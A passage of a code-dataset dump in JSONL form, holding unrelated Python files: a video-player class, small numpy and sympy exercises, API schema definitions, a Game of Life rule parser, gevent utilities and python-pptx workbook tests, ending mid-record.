p.append(pu-p0[i])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#################\n\n\n\n# Abbidlungen\nfig, ax = plt.subplots()\n#ax.plot(timef,Channel0f, color = 'red', marker='o', linestyle='', markersize = 1,label=r'$U_{Bat}$')\n#ax.plot(time,Ufuse, color = 'blue', marker='o', linestyle='', markersize = 1,label=r'$U_{Fuse}$')\n#ax.plot(time,Ubat-Ufuse,color = 'green', marker='o', linestyle='',markersize = 1,label=r'$U_{ConductivePath}$')\nax.legend(loc='upper left',frameon=True)\n#ax.set(xlabel='Time (ms)',ylabel='Voltage (V)')\nax.grid(True,linestyle='--',linewidth = 0.3)\n#plt.xlim(-70,2600)\n#plt.ylim(-0.2,5.5)\n\n#plt.hist(Channel0f, bins=5)\n\n\n#plt.xscale('log')\n#plt.title('test')\n\n#plt.errorbar(X, Y, yerr=0.1, fmt='ko', linewidth=0.8, capsize=3, capthick=0.8, markersize=5)\n\n#i='Voltage'\n#plt.savefig(\"Graphen/Temperature_\" + str(i) + \".png\")\n\n#plt.show()","sub_path":"PlottingGp-master/Wärmepumpe.py","file_name":"Wärmepumpe.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"106048270","text":"\"\"\"A video player class.\"\"\"\n\nfrom .video_library import VideoLibrary\nfrom .playlists import Playlists\nfrom .flag import Flagged\nfrom .video_playlist import VideoPlaylist\nfrom random import randint\n\n\nclass VideoPlayer:\n \"\"\"A class used to represent a Video Player.\"\"\"\n\n def __init__(self):\n \"\"\"VideoPlayer Constructor\"\"\"\n self._video_library = VideoLibrary()\n self._playlists = Playlists()\n self._flagged = Flagged()\n self._curr_id = None\n self._is_pause = False\n\n def number_of_videos(self):\n num_videos = len(self._video_library.get_all_videos())\n print(f\"{num_videos} videos in the library\")\n\n\n def show_all_videos(self):\n \"\"\"Returns all videos.\"\"\"\n print(\"Here's a list of all available videos:\")\n\n # sort the video titles in acending order\n lst = self._video_library.get_all_videos()\n lst.sort(key= lambda v: v.title)\n\n for video in lst:\n tags = \" \".join(video.tags)\n\n if self._flagged.is_flag_video(video.video_id):\n print(f\"{video.title} ({video.video_id}) [{tags}] - FLAGGED (reason: {self._flagged.get_flag_videos()[video.video_id]})\")\n else:\n print(f\"{video.title} ({video.video_id}) [{tags}]\")\n\n\n def play_video(self, video_id):\n \"\"\"Plays the respective video.\n\n Args:\n video_id: The video_id to be played.\n \"\"\"\n if self._video_library.get_video(video_id):\n\n if self._flagged.is_flag_video(video_id):\n print(f\"Cannot play video: Video is currently flagged (reason: {self._flagged.get_flag_videos()[video_id]})\")\n\n else:\n if self._curr_id != None:\n self.stop_video()\n\n print(f\"Playing video: {self._video_library.get_video(video_id).title}\")\n self._curr_id = video_id\n self._is_pause = False\n\n else:\n print(\"Cannot play video: Video does not exist\")\n\n\n def stop_video(self):\n \"\"\"Stops the current video.\"\"\"\n if self._curr_id == None:\n print(\"Cannot stop video: No video is currently playing\")\n else:\n print(f\"Stopping video: {self._video_library.get_video(self._curr_id).title}\")\n self._curr_id = None\n self._is_pause = False\n\n\n def play_random_video(self):\n \"\"\"Plays a random video from the video library.\"\"\"\n\n # all videos are flagged\n if len(self._flagged.get_flag_videos()) == len(self._video_library.get_all_videos()):\n print(\"No videos available\")\n\n else:\n\n # randomly pick a number\n if self._curr_id:\n self.stop_video()\n\n num = randint(0, len(self._video_library.get_all_videos())-1)\n\n self.play_video(self._video_library.get_all_videos()[num].video_id)\n\n\n def pause_video(self):\n \"\"\"Pauses the current video.\"\"\"\n if self._is_pause:\n print(f\"Video already paused: {self._video_library.get_video(self._curr_id).title}\")\n else:\n if self._curr_id:\n print(f\"Pausing video: {self._video_library.get_video(self._curr_id).title}\")\n self._is_pause = True\n else:\n print(\"Cannot pause video: No video is currently playing\")\n\n\n def continue_video(self):\n \"\"\"Resumes playing the current video.\"\"\"\n if self._is_pause:\n print(f\"Continuing video: {self._video_library.get_video(self._curr_id).title}\")\n else:\n if self._curr_id:\n print(\"Cannot continue video: Video is not paused\")\n else:\n print(\"Cannot continue video: No video is currently playing\")\n\n\n def show_playing(self):\n \"\"\"Displays video currently playing.\"\"\"\n if self._curr_id != None:\n the_video = self._video_library.get_video(self._curr_id)\n tags = \" \".join(the_video.tags)\n\n if self._is_pause:\n print(f\"Currently playing: {the_video.title} ({the_video.video_id}) [{tags}] - PAUSED\")\n\n else: \n print(f\"Currently playing: {the_video.title} ({the_video.video_id}) [{tags}]\")\n else:\n print(\"No video is currently playing\")\n\n\n def create_playlist(self, playlist_name):\n \"\"\"Creates a playlist with a given name.\n\n Args:\n playlist_name: The playlist name.\n \"\"\"\n if self._playlists.add_playlist(VideoPlaylist(playlist_name)):\n print(f\"Successfully created new playlist: {playlist_name}\")\n else:\n print(f\"Cannot create playlist: A playlist with the same name already exists\")\n\n\n def add_to_playlist(self, playlist_name, video_id):\n \"\"\"Adds a video to a playlist with a given name.\n\n Args:\n playlist_name: The playlist name.\n video_id: The video_id to be added.\n \"\"\"\n if self._playlists.get_playlist(playlist_name.lower()):\n\n if self._flagged.is_flag_video(video_id):\n print(f\"Cannot add video to my_playlist: Video is currently flagged (reason: {self._flagged.get_flag_videos()[video_id]})\")\n\n else:\n try:\n if self._playlists.get_playlist(playlist_name.lower()).add_to_content(video_id):\n print(f\"Added video to {playlist_name}: {self._video_library.get_video(video_id).title}\")\n else:\n print(f\"Cannot add video to {playlist_name}: Video already added\")\n except:\n print(f\"Cannot add video to {playlist_name}: Video does not exist\")\n else:\n print(f\"Cannot add video to {playlist_name}: Playlist does not exist\")\n\n\n def show_all_playlists(self):\n \"\"\"Display all playlists.\"\"\"\n if not self._playlists.number_of_playlists():\n print(\"No playlists exist yet\")\n else:\n print(\"Showing all playlists:\")\n\n # sort the playlist names in acending order\n lst = self._playlists.get_all_playlists()\n lst.sort(key= lambda v: v.name)\n\n for playlist in lst:\n print(playlist.name)\n \n\n def show_playlist(self, playlist_name):\n \"\"\"Display all videos in a playlist with a given name.\n\n Args:\n playlist_name: The playlist name.\n \"\"\"\n \n try:\n if not self._playlists.get_playlist(playlist_name).number_of_contents():\n print(f\"Showing playlist: {playlist_name}\")\n print(\"No videos here yet\")\n else:\n print(f\"Showing playlist: {playlist_name}\")\n for content in self._playlists.get_playlist(playlist_name).get_content():\n\n # get the video from id\n video = self._video_library.get_video(content)\n\n tags = \" \".join(video.tags)\n\n # check if flagged\n if self._flagged.is_flag_video(video.video_id):\n print(f\"{video.title} ({video.video_id}) [{tags}] - FLAGGED (reason: {self._flagged.get_flag_videos()[video.video_id]})\")\n else:\n print(f\"{video.title} ({video.video_id}) [{tags}]\")\n except:\n print(f\"Cannot show playlist {playlist_name}: Playlist does not exist\")\n\n\n def remove_from_playlist(self, playlist_name, video_id):\n \"\"\"Removes a video to a playlist with a given name.\n\n Args:\n playlist_name: The playlist name.\n video_id: The video_id to be removed.\n \"\"\"\n if self._playlists.get_playlist(playlist_name.lower()):\n\n if not self._video_library.get_video(video_id):\n print(f\"Cannot remove video from my_cool_playlist: Video does not exist\")\n\n else:\n if not self._playlists.get_playlist(playlist_name.lower()).remove_from_content(video_id):\n print(f\"Cannot remove video from {playlist_name}: Video is not in playlist\")\n else:\n print(f\"Removed video from {playlist_name}: {self._video_library.get_video(video_id).title}\")\n else:\n print(f\"Cannot remove video from {playlist_name}: Playlist does not exist\")\n\n\n def clear_playlist(self, playlist_name):\n \"\"\"Removes all videos from a playlist with a given name.\n\n Args:\n playlist_name: The playlist name.\n \"\"\"\n try:\n self._playlists.get_playlist(playlist_name).remove_all_content()\n print(f\"Successfully removed all videos from {playlist_name}\")\n except:\n print(f\"Cannot clear playlist my_cool_playlist: Playlist does not exist\")\n\n\n def delete_playlist(self, playlist_name):\n \"\"\"Deletes a playlist with a given name.\n\n Args:\n playlist_name: The playlist name.\n \"\"\"\n try:\n if self._playlists.remove_playlist(playlist_name):\n print(f\"Deleted playlist: {playlist_name}\")\n else:\n print(f\"Cannot delete playlist {playlist_name}: Playlist does not exist\")\n except:\n print(f\"Cannot delete playlist {playlist_name}: Playlist does not exist\")\n\n\n def search_videos(self, search_term):\n \"\"\"Display all the videos whose titles contain the search_term.\n\n Args:\n search_term: The query to be used in search.\n \"\"\"\n lst = [i for i in self._video_library.get_all_videos() if (search_term.lower() in i.title.lower()) and (not self._flagged.is_flag_video(i.video_id))]\n\n if len(lst):\n print(f\"Here are the results for {search_term}:\")\n\n for i in range(1,len(lst)+1):\n tags = \" \".join(lst[i-1].tags)\n print(f'{i}) {lst[i-1].title} ({lst[i-1].video_id}) [{tags}]')\n\n print(\"Would you like to play any of the above? If yes, specify the number of the video.\")\n\n print(\"If your answer is not a valid number, we will assume it's a no.\")\n\n ans = input(\"\")\n\n try:\n if (int(ans) <= len(lst)) and (int(ans) > 0):\n self.play_video(lst[int(ans)-1].video_id)\n except:\n pass\n\n else:\n print(f\"No search results for {search_term}\")\n\n\n def search_videos_tag(self, video_tag):\n \"\"\"Display all videos whose tags contains the provided tag.\n\n Args:\n video_tag: The video tag to be used in search.\n \"\"\"\n lst = [i for i in self._video_library.get_all_videos() if (video_tag[1:].lower() in i.video_id.lower()) and (not self._flagged.is_flag_video(i.video_id))]\n\n if len(lst):\n print(f\"Here are the results for {video_tag}:\")\n\n for i in range(1,len(lst)+1):\n tags = \" \".join(lst[i-1].tags)\n print(f'{i}) {lst[i-1].title} ({lst[i-1].video_id}) [{tags}]')\n\n print(\"Would you like to play any of the above? If yes, specify the number of the video.\")\n\n print(\"If your answer is not a valid number, we will assume it's a no.\")\n\n ans = input(\"\")\n\n try:\n if (int(ans) <= len(lst)) and (int(ans) > 0):\n self.play_video(lst[int(ans)-1].video_id)\n except:\n pass\n\n else:\n print(f\"No search results for {video_tag}\")\n\n\n def flag_video(self, video_id, flag_reason=\"Not supplied\"):\n \"\"\"Mark a video as flagged.\n\n Args:\n video_id: The video_id to be flagged.\n flag_reason: Reason for flagging the video.\n \"\"\"\n if self._video_library.get_video(video_id):\n\n if self._curr_id == video_id:\n self.stop_video()\n\n if self._flagged.add_flag_video(video_id, flag_reason):\n print(f\"Successfully flagged video: {self._video_library.get_video(video_id).title} (reason: {flag_reason})\")\n else:\n print(\"Cannot flag video: Video is already flagged\")\n else:\n print(\"Cannot flag video: Video does not exist\")\n\n\n def allow_video(self, video_id):\n \"\"\"Removes a flag from a video.\n\n Args:\n video_id: The video_id to be allowed again.\n \"\"\"\n if self._flagged.is_flag_video(video_id):\n self._flagged.remove_flag(video_id)\n print(f\"Successfully removed flag from video: {self._video_library.get_video(video_id).title}\")\n else:\n if self._video_library.get_video(video_id):\n print(\"Cannot remove flag from video: Video is not flagged\")\n\n else:\n print(\"Cannot remove flag from video: Video does not exist\")\n","sub_path":"python/src/video_player.py","file_name":"video_player.py","file_ext":"py","file_size_in_byte":12842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"195340455","text":"from random import randint\r\nimport numpy as np\r\nK = np.random.randint(0, 3)\r\nN, M = 5, 8\r\nA = [[randint(-10, 10) for j in range(M)] for i in range(N)]\r\nA = np.array(A)\r\nprint(\"Матрица:\\r\\n{}\".format(A))\r\n\r\nprint(\"K = \" + str(K))\r\nA = np.delete(A, (K-1), axis=1)\r\nprint(\"Новая матрица:\\r\\n{}\\n\".format(A))\r\n","sub_path":"2 часть/28.py","file_name":"28.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"317273192","text":"from drf_spectacular.types import OpenApiTypes\nfrom drf_spectacular.utils import OpenApiParameter, extend_schema\n\nfrom events.core.schemas.reusable import bad_request_serializer, forbidden_request_serializer\nfrom events.core.serializers import ListEventSerializer, ListInvitationSerializer, ListUserSerializer\n\nDELETE_USER = extend_schema(\n description=\"remove an friendship\",\n responses={\n \"200\": None,\n \"400\": bad_request_serializer,\n \"403\": forbidden_request_serializer,\n \"404\": bad_request_serializer,\n },\n)\n\nACCOUNT_ACTIVATION_USER = extend_schema(\n description=\"active an user account\",\n parameters=[\n OpenApiParameter(\"uid\", OpenApiTypes.UUID, OpenApiParameter.PATH),\n OpenApiParameter(\"token\", OpenApiTypes.STR, OpenApiParameter.PATH),\n ],\n responses={\n \"200\": None,\n \"400\": bad_request_serializer,\n },\n)\n\nEVENT_INVITATIONS_USER = extend_schema(\n description=\"return all invitations of type EV (Event)\",\n responses={\n \"200\": ListInvitationSerializer,\n \"404\": forbidden_request_serializer,\n },\n)\n\nFRIENDS_USER = extend_schema(\n description=\"return all friends\",\n responses={\n \"200\": ListUserSerializer,\n \"404\": forbidden_request_serializer,\n },\n)\n\nFRIENDSHIP_INVITATIONS_USER = extend_schema(\n description=\"return all invitations of type FS (Friendship)\",\n responses={\n \"200\": ListInvitationSerializer,\n \"404\": forbidden_request_serializer,\n },\n)\n\nMY_EVENTS_USER = extend_schema(\n description=\"return all events that user is owner or participate\",\n responses={\n \"200\": ListEventSerializer,\n \"404\": forbidden_request_serializer,\n },\n)\n\nREJECTED_EVENTS_USER = extend_schema(\n description=\"return all events that user rejected\",\n responses={\n \"200\": ListInvitationSerializer,\n \"404\": forbidden_request_serializer,\n },\n)\n","sub_path":"events/core/schemas/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"127886158","text":"# Fernando Valadez-Nunez\n# 02/27/2020\n\n\n# Problem 4\n# Write a Python function that takes a list of numbers and returns a new list\n# with unique elements of the first list. Use list [1, 3, 3, 3, 6, 2, 3, 5].\n\n# Use the append function.\n\ndef unique(mylist) :\n unique_list = []\n for x in mylist:\n if x not in unique_list:\n unique_list.append(x)\n for x in unique_list:\n print(x, end=\" \")\n\nmylist = [1, 3, 3, 3, 6, 2, 3, 5]\nprint(\"The unique values from the list are\")\nunique(mylist)\n","sub_path":"Problem4Unique.py","file_name":"Problem4Unique.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"255440913","text":"'''\nAuthor: Puffrora\nDate: 2021-09-12 01:41:04\nLastModifiedBy: Puffrora\nLastEditTime: 2021-09-12 02:01:37\n'''\n\nfrom typing import List\n\nclass FindSumPairs:\n\n def __init__(self, nums1: List[int], nums2: List[int]):\n from collections import Counter\n self.nums1 = nums1\n self.nums2 = nums2\n self.counter = Counter(nums2)\n\n def add(self, index: int, val: int) -> None:\n n2 = self.nums2[index]\n self.counter[n2] -= 1\n self.counter[n2+val] += 1\n\n self.nums2[index] += val\n\n def count(self, tot: int) -> int:\n res = 0\n for n1 in self.nums1:\n res += self.counter[tot-n1]\n return res\n\n\n# Your FindSumPairs object will be instantiated and called as such:\n# obj = FindSumPairs(nums1, nums2)\n# obj.add(index,val)\n# param_2 = obj.count(tot)","sub_path":"Leetcode/leetcode1865 找出和为指定值的下标对.py","file_name":"leetcode1865 找出和为指定值的下标对.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"505768675","text":"\nfrom django import template\nfrom corpora.utils.tmp_files import get_file_url\nimport logging\nlogger = logging.getLogger('corpora')\n\nregister = template.Library()\n\n\n@register.filter()\ndef access_url(file):\n '''Takes a file object and returns the s3 signed url'''\n if file:\n if 'http' in file.url:\n return get_file_url(file, expires=60*60)\n else:\n return file.url\n","sub_path":"corpora/transcription/templatetags/file_access.py","file_name":"file_access.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"345386780","text":"\"\"\"\n# Copyright 1999-2005 Gentoo Foundation\n# This source code is distributed under the terms of version 2 of the GNU\n# General Public License as published by the Free Software Foundation, a copy\n# of which can be found in the main directory of this project.\nGentoo Linux Installer Test Suite\n$Header: /var/cvsroot/gentoo/src/installer/src/tests/test_GLI_InstallProfile.py,v 1.5 2005/08/22 18:35:52 codeman Exp $\n\"\"\"\n\nimport unittest\nimport os\nimport GLIInstallProfile\n\nclass test_GLIInstallProfile (unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.failUnless(os.path.exists(\"GLIInstallProfile.py\"), \"Please run tests from src\")\n\n\tdef testInstantiate(self):\n\t\tprofile = GLIInstallProfile.InstallProfile();\n\n\t\tself.failUnless(profile, \"Could not instantiate InstallProfile\");\n\n\tdef testParse(self):\n\t\tprofile = GLIInstallProfile.InstallProfile()\n\n\t\tself.failUnless(profile, \"Could not instantiate InstallProfile\");\n\n\t\tpath = os.getcwd()\n\t\tpath = os.path.join(path, \"tests\", \"gli_test_profile.xml\")\n\n\t\tprofile.parse(\"file://\" + path)\n\n\t\tself.assertEquals(profile.get_time_zone(), \"GMT\")\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"pinstaller/trunk/tests/test_GLI_InstallProfile.py","file_name":"test_GLI_InstallProfile.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"207812685","text":"import operator\nfrom typing import Dict, Union, Any, List\n\nfrom gol.common import Grid, Point2D\nfrom gol.rules_parser.comparison import Comparison\n\n\nBOOL_OPERATORS = {\n 'and': operator.and_,\n 'or': operator.or_,\n}\n\n\nclass BoolOperator:\n def __init__(self, operator: str,\n operands: List[Union[Comparison, 'BoolOperator']]):\n assert operator in BOOL_OPERATORS\n\n self.operands = operands\n self.operator = BOOL_OPERATORS[operator]\n self.operator_text = operator\n\n def __str__(self):\n return '(' + (' '+self.operator_text+' ').\\\n join([str(op) for op in self.operands]) + ')'\n\n def __repr__(self):\n return 'BoolOperator(' + (' '+self.operator_text+' ').\\\n join([str(op) for op in self.operands]) + ')'\n\n def web_repr(self):\n return {\n 'className': 'BoolOperator',\n 'args': ([self.operator_text] +\n [op.web_repr() for op in self.operands]),\n }\n\n def __call__(self, grid: Grid, pos: Point2D,\n global_config: Dict[str, Any]) -> bool:\n if self.operator == operator.and_:\n for operand in self.operands:\n if not operand(grid, pos, global_config):\n return False\n return True\n elif self.operator == operator.or_:\n for operand in self.operands:\n if operand(grid, pos, global_config):\n return True\n return False\n\n assert False, 'Invalid operator in evaluation!'\n\n\ndef parse_bool_expr(p):\n p_ = p[0]\n if len(p_) == 1:\n return p_\n\n operands = [p_[i] for i in range(0, len(p_), 2)]\n return BoolOperator(p_[1], operands)\n","sub_path":"gol/rules_parser/bool_operator.py","file_name":"bool_operator.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"161566096","text":"# from __future__ import absolute_import\n\nimport sys\n\nimport os\nimport os.path\nimport argparse\nfrom collections import defaultdict, OrderedDict\n\nimport numpy as np\nimport numpy.random as rand\nimport re\n\nimport pybedtools as pbt\n\nimport pandas as pd\n\nfrom makeamip.capcommon import *\n\nif __name__ == '__main__':\n \n opts = argparse.ArgumentParser()\n \n opts.add_argument('--inTbl', dest='inTbl')\n opts.add_argument('--colChrom', dest='colChrom')\n opts.add_argument('--colStart', dest='colStart')\n opts.add_argument('--colEnd', dest='colEnd')\n\n opts.add_argument('--outTbl',dest='outTbl')\n opts.add_argument('--colOutTarget',dest='colOutTarget')\n\n opts.add_argument('--inBedTargets', dest='inBedTargets')\n\n o = opts.parse_args()\n\n tbl = pd.read_csv(o.inTbl,sep='\\t')\n tbl[o.colOutTarget]=''\n\n btTbl = tbl[ ['chrom','start','end'] ].copy()\n btTbl['name'] = btTbl.index\n btTbl = pbt.BedTool.from_dataframe( btTbl )\n\n btTargets = pbt.BedTool(o.inBedTargets)\n tblTargets = \\\n pd.DataFrame( {'chrom': [iv.chrom for iv in btTargets],\n 'start': [iv.start for iv in btTargets],\n 'end': [iv.end for iv in btTargets],\n 'name': range(len(btTargets)) } )\n tblTargets=tblTargets[ ['chrom','start','end','name'] ]\n btTargets = pbt.BedTool.from_dataframe( tblTargets )\n\n probesToTgts = btTbl.intersect( btTargets, wa=True, wb=True )\n probesToTgts = pd.DataFrame( [iv.fields for iv in probesToTgts ] )\n probesToTgts = probesToTgts.convert_objects(convert_numeric=True)\n\n # group by 3 = id of probe. join 7 (id(s) of targets)\n z=probesToTgts[[3,7]].groupby(3).agg( lambda g:str(','.join( [str(v) for v in g[7]] )))\n \n tbl.ix[ z.index, 'cap_tgt' ] = z[7] \n\n tbl.ix[ z.index, o.colOutTarget] = z[7]\n tbl.to_csv( o.outTbl, sep='\\t', index=False )\n","sub_path":"makeamip/annotate_miptbl_with_target.py","file_name":"annotate_miptbl_with_target.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"273495713","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# 問題2\n\n# In[6]:\n\n\nimport sympy as sp\n\n\n# In[23]:\n\n\nAx=2\nAy=0\n\ntheta=sp.Symbol('theta',real=True)\nP1x=5*sp.cos(2*theta)\nP1y=5*sp.sin(2*theta)\nP2x=10*sp.cos(theta)\nP2y=10*sp.sin(theta)\n\narea_AP1P2=((P1x-Ax)*(P2y-Ay)-(P1y-Ay)*(P2x-Ax))/2\narea_AP1P2=sp.trigsimp(area_AP1P2)\narea_AP1P2_diff=sp.diff(area_AP1P2,theta)\nresults=sp.solve(area_AP1P2_diff,theta)\n\nanswers=[]\nfor i in results:\n tmp=area_AP1P2.subs(theta,i)\n answers.append(tmp)\n \nprint('△AP1P2の最大値は ',sp.trigsimp(max(answers)))\n\n","sub_path":"0527/2200104039/Question2.py","file_name":"Question2.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"535446686","text":"# Copyright (c) 2009 Denis Bilenko. See LICENSE for details.\n__all__ = ['wrap_errors']\n\nimport sys\nimport traceback\n\nimport logging\n_log = logging.getLogger(__name__)\nch = logging.StreamHandler()\n_log.addHandler(ch)\n\nclass Log(object):\n\n def __init__(self, log='default'):\n if log == 'default':\n self._log = _log\n else:\n self._log = log\n\n def __getattr__(self, name):\n if len(logging.root.handlers) > 0:\n if name == 'log':\n if isinstance(self._log, logging.Logger):\n return self.log_logging\n else:\n return self.log_stderr\n else:\n return self.log_stderr\n raise AttributeError()\n\n def log_logging(self, msg):\n if isinstance(self._log, logging.Logger) is False:\n self.log_stderr(msg)\n return\n _log.warn(msg)\n \n def log_stderr(self, msg):\n msg = \"%s\\n\" % msg\n sys.stderr.write(msg)\n\n def exception(self, msg):\n if isinstance(self._log, logging.getLogger) is False:\n traceback.print_exc()\n return\n _log.exception(msg)\n\nclass wrap_errors(object):\n \"\"\"Helper to make function return an exception, rather than raise it.\n\n Because every exception that is unhandled by greenlet will be logged,\n it is desirable to prevent non-error exceptions from leaving a greenlet.\n This can done with simple ``try``/``except`` construct::\n\n def wrapped_func(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except (A, B, C), ex:\n return ex\n\n :class:`wrap_errors` provides a shortcut to write that in one line::\n\n wrapped_func = wrap_errors((A, B, C), func)\n\n It also preserves ``__str__`` and ``__repr__`` of the original function.\n \"\"\"\n # QQQ could also support using wrap_errors as a decorator\n\n def __init__(self, errors, func):\n \"\"\"Make a new function from `func', such that it catches `errors' (an\n Exception subclass, or a tuple of Exception subclasses) and return\n it as a value.\n \"\"\"\n self.errors = errors\n self.func = func\n\n def __call__(self, *args, **kwargs):\n func = self.func\n try:\n return func(*args, **kwargs)\n except self.errors:\n return sys.exc_info()[1]\n\n def __str__(self):\n return str(self.func)\n\n def __repr__(self):\n return repr(self.func)\n\n def __getattr__(self, item):\n return getattr(self.func, item)\n","sub_path":"gevent/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"25214630","text":"# encoding: utf-8\n\n\"\"\"\nTest suite for pptx.chart.xlsx module\n\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport pytest\n\nfrom xlsxwriter import Workbook\nfrom xlsxwriter.worksheet import Worksheet\n\nfrom pptx.chart.data import (\n BubbleChartData, Categories, CategoryChartData, CategorySeriesData,\n XyChartData\n)\nfrom pptx.chart.xlsx import (\n _BaseWorkbookWriter, BubbleWorkbookWriter, CategoryWorkbookWriter,\n XyWorkbookWriter\n)\nfrom pptx.compat import BytesIO\n\nfrom ..unitutil.mock import ANY, call, class_mock, instance_mock, method_mock\n\n\nclass Describe_BaseWorkbookWriter(object):\n\n def it_can_generate_a_chart_data_Excel_blob(self, xlsx_blob_fixture):\n workbook_writer, xlsx_file_, workbook_, worksheet_, xlsx_blob = (\n xlsx_blob_fixture\n )\n _xlsx_blob = workbook_writer.xlsx_blob\n\n workbook_writer._open_worksheet.assert_called_once_with(xlsx_file_)\n workbook_writer._populate_worksheet.assert_called_once_with(\n workbook_writer, workbook_, worksheet_\n )\n assert _xlsx_blob is xlsx_blob\n\n def it_can_open_a_worksheet_in_a_context(self, open_fixture):\n wb_writer, xlsx_file_, workbook_, worksheet_, Workbook_ = open_fixture\n\n with wb_writer._open_worksheet(xlsx_file_) as (workbook, worksheet):\n Workbook_.assert_called_once_with(xlsx_file_, {'in_memory': True})\n workbook_.add_worksheet.assert_called_once_with()\n assert workbook is workbook_\n assert worksheet is worksheet_\n workbook_.close.assert_called_once_with()\n\n def it_raises_on_no_override_of_populate(self, populate_fixture):\n workbook_writer = populate_fixture\n with pytest.raises(NotImplementedError):\n workbook_writer._populate_worksheet(None, None)\n\n # fixtures -------------------------------------------------------\n\n @pytest.fixture\n def open_fixture(self, xlsx_file_, workbook_, worksheet_, Workbook_):\n workbook_writer = _BaseWorkbookWriter(None)\n workbook_.add_worksheet.return_value = worksheet_\n return workbook_writer, xlsx_file_, workbook_, worksheet_, Workbook_\n\n @pytest.fixture\n def populate_fixture(self):\n workbook_writer = _BaseWorkbookWriter(None)\n return workbook_writer\n\n @pytest.fixture\n def xlsx_blob_fixture(\n self, request, xlsx_file_, workbook_, worksheet_,\n _populate_worksheet_, _open_worksheet_, BytesIO_):\n workbook_writer = _BaseWorkbookWriter(None)\n xlsx_blob = 'fooblob'\n BytesIO_.return_value = xlsx_file_\n # to make context manager behavior work\n _open_worksheet_.return_value.__enter__.return_value = (\n workbook_, worksheet_\n )\n xlsx_file_.getvalue.return_value = xlsx_blob\n return (\n workbook_writer, xlsx_file_, workbook_, worksheet_, xlsx_blob\n )\n\n # fixture components ---------------------------------------------\n\n @pytest.fixture\n def BytesIO_(self, request):\n return class_mock(request, 'pptx.chart.xlsx.BytesIO')\n\n @pytest.fixture\n def _open_worksheet_(self, request):\n return method_mock(request, _BaseWorkbookWriter, '_open_worksheet')\n\n @pytest.fixture\n def _populate_worksheet_(self, request):\n return method_mock(\n request, _BaseWorkbookWriter, '_populate_worksheet',\n autospec=True\n )\n\n @pytest.fixture\n def Workbook_(self, request, workbook_):\n return class_mock(\n request, 'pptx.chart.xlsx.Workbook', return_value=workbook_\n )\n\n @pytest.fixture\n def workbook_(self, request):\n return instance_mock(request, Workbook)\n\n @pytest.fixture\n def worksheet_(self, request):\n return instance_mock(request, Worksheet)\n\n @pytest.fixture\n def xlsx_file_(self, request):\n return instance_mock(request, BytesIO)\n\n\nclass DescribeCategoryWorkbookWriter(object):\n\n def it_knows_the_categories_range_ref(self, categories_ref_fixture):\n workbook_writer, expected_value = categories_ref_fixture\n assert workbook_writer.categories_ref == expected_value\n\n def it_raises_on_cat_ref_on_no_categories(self, cat_ref_raises_fixture):\n workbook_writer = cat_ref_raises_fixture\n with pytest.raises(ValueError):\n workbook_writer.categories_ref\n\n def it_knows_the_ref_for_a_series_name(self, ser_name_ref_fixture):\n workbook_writer, series_, expected_value = ser_name_ref_fixture\n assert workbook_writer.series_name_ref(series_) == expected_value\n\n def it_knows_the_values_range_ref(self, values_ref_fixture):\n workbook_writer, series_, expected_value = values_ref_fixture\n assert workbook_writer.values_ref(series_) == expected_value\n\n def it_can_populate_a_worksheet_with_chart_data(self, populate_fixture):\n workbook_writer, workbook_, worksheet_, expected_calls = (\n populate_fixture\n )\n workbook_writer._populate_worksheet(workbook_, worksheet_)\n assert worksheet_.mock_calls == expected_calls\n\n # fixtures -------------------------------------------------------\n\n @pytest.fixture(params=[\n (1, 1, 'Sheet1!$A$2:$A$2'),\n (1, 3, 'Sheet1!$A$2:$A$4'),\n (2, 4, 'Sheet1!$A$2:$B$5'),\n (3, 8, 'Sheet1!$A$2:$C$9'),\n ])\n def categories_ref_fixture(self, request, chart_data_, categories_):\n depth, leaf_count, expected_value = request.param\n workbook_writer = CategoryWorkbookWriter(chart_data_)\n chart_data_.categories = categories_\n categories_.depth, categories_.leaf_count = depth, leaf_count\n return workbook_writer, expected_value\n\n @pytest.fixture\n def cat_ref_raises_fixture(self, request, chart_data_, categories_):\n workbook_writer = CategoryWorkbookWriter(chart_data_)\n chart_data_.categories = categories_\n categories_.depth = 0\n return workbook_writer\n\n @pytest.fixture(params=[\n ([[[0, 'a'], [1, 'b'], [2, 'c']]],\n [(1, 0, 'a'), (2, 0, 'b'), (3, 0, 'c')],\n [('s1', (1, 2, 3)), ('s2', (4, 5, 6))],\n [((0, 1, 's1'), (1, 1, (1, 2, 3), ANY)),\n ((0, 2, 's2'), (1, 2, (4, 5, 6), ANY))]),\n\n ([[[0, 'CA'], [1, 'NV'], [2, 'NY'], [3, 'NJ']],\n [[0, 'WEST'], [2, 